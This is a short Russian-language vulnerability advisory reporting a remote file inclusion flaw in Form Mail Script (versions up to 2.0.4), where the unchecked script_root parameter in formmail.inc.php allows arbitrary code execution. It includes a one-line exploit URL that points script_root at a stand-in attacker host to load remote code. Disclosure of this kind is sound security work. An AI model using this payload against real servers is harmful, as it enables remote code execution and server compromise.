SVadvisory#8
Title: Php инъекция в Form Mail Script
Программа: Form Mail Script
Уязвимая версия: <= 2.0.4
Homepage: http://www.stadtaus.com/en/php_scripts/formmail_script/
Найдена уязвимость: 27.06.05
Нашел: patr0n / SVT / www.svt.nukleon.us
============================================================================
Описание.
<><><><><>
Уязвимость обнаружена в скрипте formmail.inc.php, из-за отсутствия проверки
параметра script_root. При правильной эксплуатации уязвимости возможно
выполнить произвольный код на уязвимом серевере.
Пример/эксплойт.
<><><><><><><><>
http://victim.com/mail/inc/formmail.inc.php?script_root=http://attacker.com/
Search Vulnerabilities Team / www.svt.nukleon.us /
CENSORED | Cash | Fredy | patr0n | Loader |
___
___ / /
\\ / /
| // /
| |\ \/ | |
/| \/ |
| |
|_ |
| |
|_______|